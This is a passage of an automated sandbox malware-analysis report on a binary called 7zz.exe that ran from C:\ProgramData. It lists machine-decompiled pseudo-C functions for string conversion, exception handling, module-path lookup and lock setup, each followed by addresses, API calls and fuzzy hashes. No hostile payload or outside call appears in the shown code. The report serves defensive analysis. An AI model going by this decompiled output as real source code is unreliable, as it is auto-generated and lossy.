                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Info
                                                                                                                                    • String ID: $
                                                                                                                                    • API String ID: 1807457897-3032137957
                                                                                                                                    • Opcode ID: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
                                                                                                                                    • Instruction ID: 5c3e5dd18d5ca2b0f7a6e0339bafee86ed4275ccb2fec3f011e76292e71c390b
                                                                                                                                    • Opcode Fuzzy Hash: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
                                                                                                                                    • Instruction Fuzzy Hash: 2E4189310042981AEB269768DD49BFB7FECEB06704F1404F7D94DC6272D2798948CBAA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041C936 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E0041C936(void* __ecx, void* __edx) {
				intOrPtr _t59;
				void* _t69;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t103;

				_t89 = __edx;
				L0046B890(E00475600, _t103);
				_t99 = __edx;
				L004039C0(_t103 - 0x18, __ecx);
				_t2 = _t103 - 4;
				 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2, _t99);
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2,  *((intOrPtr*)(_t103 + 8)));
				_t77 = _t103 - 0x24;
				L004039C0(_t77, _t103 - 0x18);
				L0046B8F4(_t103 - 0x24, 0x481390);
				_t100 = _t98;
				L0046B890(E00475614, _t103);
				_t69 = _t89;
				 *((intOrPtr*)(_t103 - 0x14)) = _t77;
				_t59 =  *((intOrPtr*)(_t69 + 8));
				_t78 = 1;
				if(_t59 > _t78) {
					_push(_t100);
					 *((intOrPtr*)(_t103 - 0x10)) = _t78;
					_t101 = 0;
					do {
						_t17 = _t101 + 4; // 0x4
						_t96 = _t17;
						if(E0040881C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4))) == 0) {
							L00403532(_t103 - 0x20,  *0x48c33c);
							 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							E0041C936(_t103 - 0x20,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
							E00407A18( *((intOrPtr*)(_t103 - 0x20)));
						}
						 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)(_t103 - 0x10)) + 1;
						_t101 = _t96;
						_t59 =  *((intOrPtr*)(_t103 - 0x10));
					} while (_t59 <  *((intOrPtr*)(_t69 + 8)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t59;
			}














                                                                                                                                    0x0041c936
                                                                                                                                    0x0041c93b
                                                                                                                                    0x0041c945
                                                                                                                                    0x0041c94a
                                                                                                                                    0x0041c94f
                                                                                                                                    0x0041c94f
                                                                                                                                    0x0041c958
                                                                                                                                    0x0041c961
                                                                                                                                    0x0041c96b
                                                                                                                                    0x0041c976
                                                                                                                                    0x0041c97e
                                                                                                                                    0x0041c982
                                                                                                                                    0x0041c990
                                                                                                                                    0x0041c995
                                                                                                                                    0x0041c99b
                                                                                                                                    0x0041c9a4
                                                                                                                                    0x0041c9a6
                                                                                                                                    0x0041c9ab
                                                                                                                                    0x0041c9ae
                                                                                                                                    0x0041c9b1
                                                                                                                                    0x0041c9b3
                                                                                                                                    0x0041c9b5
                                                                                                                                    0x0041c9b8
                                                                                                                                    0x0041c9ba
                                                                                                                                    0x0041c9c0
                                                                                                                                    0x0041c9c0
                                                                                                                                    0x0041c9d9
                                                                                                                                    0x0041c9e4
                                                                                                                                    0x0041c9ef
                                                                                                                                    0x0041ca02
                                                                                                                                    0x0041ca08
                                                                                                                                    0x0041ca0d
                                                                                                                                    0x0041ca14
                                                                                                                                    0x0041ca19
                                                                                                                                    0x0041ca1a
                                                                                                                                    0x0041ca1d
                                                                                                                                    0x0041ca1f
                                                                                                                                    0x0041ca22
                                                                                                                                    0x0041ca28
                                                                                                                                    0x0041ca2d
                                                                                                                                    0x0041ca35

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041C93B
                                                                                                                                      • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041C99B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ExceptionRaise
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 2062786585-2780377667
                                                                                                                                    • Opcode ID: e207c97f556b329c3e51807eb9ff57e554815a7ca76bcb34c2088d126171e5e3
                                                                                                                                    • Instruction ID: a6f31d39d81224240f44a0bd5d30bed56bf58cfd7ee645fd7ff7855bc7c346c4
                                                                                                                                    • Opcode Fuzzy Hash: e207c97f556b329c3e51807eb9ff57e554815a7ca76bcb34c2088d126171e5e3
                                                                                                                                    • Instruction Fuzzy Hash: 3F31A531A105059BCB14EF99C8829EEB779FF48314F50402EE906B7292DB38AE42CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040816E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040816E(intOrPtr __ecx, short** __edx, void* __edi, void* __eflags) {
				intOrPtr _t36;
				int _t42;
				char* _t54;
				void* _t61;
				short** _t65;
				void* _t68;

				L0046B890(0x473818, _t68);
				 *((intOrPtr*)(_t68 - 0x10)) = __ecx;
				_t65 = __edx;
				 *((intOrPtr*)(_t68 - 0x18)) = 0;
				 *(_t68 - 0x24) = 0;
				 *(_t68 - 0x20) = 0;
				 *((intOrPtr*)(_t68 - 0x1c)) = 0;
				E00401EEE(_t68 - 0x24, 3);
				 *((intOrPtr*)(_t68 - 4)) = 0;
				 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = 0;
				_t36 =  *((intOrPtr*)(__edx + 4));
				if(_t36 != 0) {
					_t61 = _t36 + _t36;
					if(_t61 >=  *((intOrPtr*)(_t68 - 0x1c))) {
						E00401EEE(_t68 - 0x24, _t61);
					}
					_t54 = _t68 + 0xc;
					_t42 = WideCharToMultiByte( *(_t68 + 8), 0,  *_t65, _t65[1],  *(_t68 - 0x24), _t61 + 1, _t54, _t68 - 0x14);
					 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = _t54 & 0xffffff00 |  *(_t68 - 0x14) != 0x00000000;
					if(_t42 == 0) {
						 *((intOrPtr*)(_t68 + 0x10)) = 0x44e75;
						_t42 = L0046B8F4(_t68 + 0x10, 0x47e128);
					}
					( *(_t68 - 0x24))[_t42] = 0;
					 *(_t68 - 0x20) = _t42;
				}
				E00401E64( *((intOrPtr*)(_t68 - 0x10)), _t68 - 0x24);
				E00407A18( *(_t68 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return  *((intOrPtr*)(_t68 - 0x10));
			}









                                                                                                                                    0x00408173
                                                                                                                                    0x0040817c
                                                                                                                                    0x00408182
                                                                                                                                    0x00408189
                                                                                                                                    0x0040818c
                                                                                                                                    0x0040818f
                                                                                                                                    0x00408192
                                                                                                                                    0x00408195
                                                                                                                                    0x0040819d
                                                                                                                                    0x004081a0
                                                                                                                                    0x004081a2
                                                                                                                                    0x004081a7
                                                                                                                                    0x004081aa
                                                                                                                                    0x004081b0
                                                                                                                                    0x004081b6
                                                                                                                                    0x004081b6
                                                                                                                                    0x004081c4
                                                                                                                                    0x004081d3
                                                                                                                                    0x004081e5
                                                                                                                                    0x004081e7
                                                                                                                                    0x004081f2
                                                                                                                                    0x004081f9
                                                                                                                                    0x004081f9
                                                                                                                                    0x00408201
                                                                                                                                    0x00408204
                                                                                                                                    0x00408204
                                                                                                                                    0x0040820e
                                                                                                                                    0x00408216
                                                                                                                                    0x00408224
                                                                                                                                    0x0040822c

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00408173
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000004,00000003,00000001,?,00000000,59@,00000003,?,00000000,00407F1C,00000000), ref: 004081D3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharH_prologMultiWide
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 3731712410-2780377667
                                                                                                                                    • Opcode ID: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
                                                                                                                                    • Instruction ID: af53ffafe5e3b4cbac78d31c94e9b62b0eb73677ea79480e45141f723c5d0b6c
                                                                                                                                    • Opcode Fuzzy Hash: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
                                                                                                                                    • Instruction Fuzzy Hash: 24213C72900249DFCB14DF99C9819EEBBF8FF49300B50446EE815B7251C739AE04CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00414B6B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00414B6B(void* __eflags) {
				char _t32;
				void* _t37;
				char _t39;
				void* _t55;
				intOrPtr _t58;
				void* _t59;

				L0046B890(E00474780, _t59);
				_t39 = 0;
				 *((intOrPtr*)(_t59 - 0x20)) = 0;
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				 *((intOrPtr*)(_t59 - 4)) = 0;
				if(L00413C1F(_t59 - 0x28, 0x500) != 0) {
					_t58 =  *((intOrPtr*)(_t59 - 0x20));
					_t32 = 0;
					do {
						 *((char*)(_t32 + _t58)) = _t32;
						_t32 = _t32 + 1;
					} while (_t32 < 0x100);
					if(E00414C43(_t32, _t58, 0x100) == 0x29058c73) {
						 *((intOrPtr*)(_t59 - 0x1c)) = 0x159a55e5;
						 *((intOrPtr*)(_t59 - 0x18)) = 0x1f123bb5;
						E00414C74(_t58 + 0x100, 0x400, _t59 - 0x1c);
						 *((intOrPtr*)(_t59 - 0x14)) = 0;
						do {
							_t36 =  *((intOrPtr*)(_t59 - 0x14));
							 *(_t59 - 0x10) =  *(_t59 - 0x10) & 0x00000000;
							_t55 =  *((intOrPtr*)(_t59 - 0x14)) + _t58;
							while(1) {
								_t37 = E00414C43(_t36, _t55,  *(_t59 - 0x10));
								if(_t37 != L0046B1C0(_t55,  *(_t59 - 0x10))) {
									break;
								}
								 *(_t59 - 0x10) =  *(_t59 - 0x10) + 1;
								if( *(_t59 - 0x10) < 0x20) {
									continue;
								} else {
									goto L8;
								}
								goto L10;
							}
							_t39 = 0;
							goto L10;
							L8:
							 *((intOrPtr*)(_t59 - 0x14)) =  *((intOrPtr*)(_t59 - 0x14)) + 1;
						} while ( *((intOrPtr*)(_t59 - 0x14)) < 0x4e0);
						_t39 = 1;
					}
				}
				L10:
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				E004585E0( *((intOrPtr*)(_t59 - 0x20)));
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return _t39;
			}









                                                                                                                                    0x00414b70
                                                                                                                                    0x00414b79
                                                                                                                                    0x00414b7d
                                                                                                                                    0x00414b80
                                                                                                                                    0x00414b8f
                                                                                                                                    0x00414b99
                                                                                                                                    0x00414b9f
                                                                                                                                    0x00414ba2
                                                                                                                                    0x00414ba9
                                                                                                                                    0x00414ba9
                                                                                                                                    0x00414bac
                                                                                                                                    0x00414bad
                                                                                                                                    0x00414bbd
                                                                                                                                    0x00414bce
                                                                                                                                    0x00414bd5
                                                                                                                                    0x00414bdc
                                                                                                                                    0x00414be1
                                                                                                                                    0x00414be4
                                                                                                                                    0x00414be4
                                                                                                                                    0x00414be7
                                                                                                                                    0x00414beb
                                                                                                                                    0x00414bee
                                                                                                                                    0x00414bf3
                                                                                                                                    0x00414c06
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414c08
                                                                                                                                    0x00414c0f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414c0f
                                                                                                                                    0x00414c3f
                                                                                                                                    0x00000000
                                                                                                                                    0x00414c11
                                                                                                                                    0x00414c11
                                                                                                                                    0x00414c14
                                                                                                                                    0x00414c1d
                                                                                                                                    0x00414c1d
                                                                                                                                    0x00414bbd
                                                                                                                                    0x00414c1f
                                                                                                                                    0x00414c22
                                                                                                                                    0x00414c29
                                                                                                                                    0x00414c36
                                                                                                                                    0x00414c3e

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: $[<A
                                                                                                                                    • API String ID: 3519838083-980560344
                                                                                                                                    • Opcode ID: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
                                                                                                                                    • Instruction ID: a66645b3afa9c2ee447036ac3f63c81d7f7369c510e48348743a797e60edc476
                                                                                                                                    • Opcode Fuzzy Hash: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
                                                                                                                                    • Instruction Fuzzy Hash: BD218E70A012198BCF04EFA5C5806EEB776FFD8308F64441FC502B7241EB789A85CBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00470889 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E00470889() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x49658c; // 0x1
				if(_t46 == 0) {
					E00471C08();
				}
				GetModuleFileNameA(0, 0x49373c, 0x104);
				_t14 =  *0x49659c; // 0x643f70
				 *0x49371c = 0x49373c;
				_t37 = 0x49373c;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E00470922(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = L0046BFC5(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E0046D03C(8);
				}
				E00470922(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x493704 = _t41;
				 *0x493700 = _t27;
				return _t27;
			}










                                                                                                                                    0x0047088d
                                                                                                                                    0x00470891
                                                                                                                                    0x00470899
                                                                                                                                    0x0047089b
                                                                                                                                    0x0047089b
                                                                                                                                    0x004708ac
                                                                                                                                    0x004708b2
                                                                                                                                    0x004708b7
                                                                                                                                    0x004708bd
                                                                                                                                    0x004708c1
                                                                                                                                    0x004708c3
                                                                                                                                    0x004708c3
                                                                                                                                    0x004708d0
                                                                                                                                    0x004708e4
                                                                                                                                    0x004708eb
                                                                                                                                    0x004708ef
                                                                                                                                    0x004708f4
                                                                                                                                    0x00470906
                                                                                                                                    0x00470911
                                                                                                                                    0x00470912
                                                                                                                                    0x0047091a
                                                                                                                                    0x00470921

                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\7zz.exe,00000104,?,?,?,?,?,?,0046CFEB), ref: 004708AC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileModuleName
                                                                                                                                    • String ID: C:\ProgramData\7zz.exe$p?d
                                                                                                                                    • API String ID: 514040917-488131466
                                                                                                                                    • Opcode ID: 374ca1ee558913e055006786c4f8ac9f9bc5f2affd582e0ef7d88b07fb241204
                                                                                                                                    • Instruction ID: 074cebae59902112b58a1229290a15cee7db23e677cd0c16cc7fd055ee0c8137
                                                                                                                                    • Opcode Fuzzy Hash: 374ca1ee558913e055006786c4f8ac9f9bc5f2affd582e0ef7d88b07fb241204
                                                                                                                                    • Instruction Fuzzy Hash: 0F113DF6900118BFD711EFD5DC81CEB7BACEB05268B0140BBF549D7202E634AE448BA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004080C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004080C7(intOrPtr __ecx, char** __edx, void* __eflags) {
				signed int _t33;
				intOrPtr _t48;
				char** _t52;
				void* _t55;

				L0046B890(0x473804, _t55);
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				_t52 = __edx;
				 *((intOrPtr*)(_t55 - 0x14)) = 0;
				 *(_t55 - 0x20) = 0;
				 *(_t55 - 0x1c) = 0;
				 *((intOrPtr*)(_t55 - 0x18)) = 0;
				E00401E9A(_t55 - 0x20, 3);
				_t48 =  *((intOrPtr*)(__edx + 4));
				 *((intOrPtr*)(_t55 - 4)) = 0;
				if(_t48 != 0) {
					if(_t48 >=  *((intOrPtr*)(_t55 - 0x18))) {
						E00401E9A(_t55 - 0x20, _t48);
					}
					_t33 = MultiByteToWideChar( *(_t55 + 8), 0,  *_t52, _t52[1],  *(_t55 - 0x20), _t48 + 1);
					if(_t33 == 0) {
						 *(_t55 + 8) = 0x44e74;
						_t33 = L0046B8F4(_t55 + 8, 0x47e128);
					}
					( *(_t55 - 0x20))[_t33] = 0;
					 *(_t55 - 0x1c) = _t33;
				}
				L004039C0( *((intOrPtr*)(_t55 - 0x10)), _t55 - 0x20);
				E00407A18( *(_t55 - 0x20));
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return  *((intOrPtr*)(_t55 - 0x10));
			}







                                                                                                                                    0x004080cc
                                                                                                                                    0x004080d6
                                                                                                                                    0x004080dc
                                                                                                                                    0x004080e3
                                                                                                                                    0x004080e6
                                                                                                                                    0x004080e9
                                                                                                                                    0x004080ec
                                                                                                                                    0x004080ef
                                                                                                                                    0x004080f4
                                                                                                                                    0x004080f7
                                                                                                                                    0x004080fc
                                                                                                                                    0x00408101
                                                                                                                                    0x00408107
                                                                                                                                    0x00408107
                                                                                                                                    0x0040811c
                                                                                                                                    0x00408124
                                                                                                                                    0x0040812f
                                                                                                                                    0x00408136
                                                                                                                                    0x00408136
                                                                                                                                    0x0040813e
                                                                                                                                    0x00408142
                                                                                                                                    0x00408142
                                                                                                                                    0x0040814c
                                                                                                                                    0x00408154
                                                                                                                                    0x00408163
                                                                                                                                    0x0040816b

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004080CC
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000002,?,?,00000003,59@,?,00000000,?,?,?,?,00000000), ref: 0040811C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharH_prologMultiWide
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 3731712410-2780377667
                                                                                                                                    • Opcode ID: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
                                                                                                                                    • Instruction ID: d702833a8b0d2e9c08c0512ca54372eb887272844dd4864684de151fd06ec4aa
                                                                                                                                    • Opcode Fuzzy Hash: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
                                                                                                                                    • Instruction Fuzzy Hash: 8D11F9B1900119AFCF10EF9AC9819EEBBB9FF88354B40443EE545B7251D7386A41CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046E541 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046E541(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x48e0ac);
				InitializeCriticalSection( *0x48e09c);
				InitializeCriticalSection( *0x48e08c);
				InitializeCriticalSection( *0x48e06c);
				return _t1;
			}




                                                                                                                                    0x0046e541
                                                                                                                                    0x0046e54e
                                                                                                                                    0x0046e556
                                                                                                                                    0x0046e55e
                                                                                                                                    0x0046e566
                                                                                                                                    0x0046e569

                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E54E
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E556
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E55E
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E566
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 32694325-0
                                                                                                                                    • Opcode ID: dc021efed5507b4fb83a724604d938c0a9f009831836a325e097d52029dd6aec
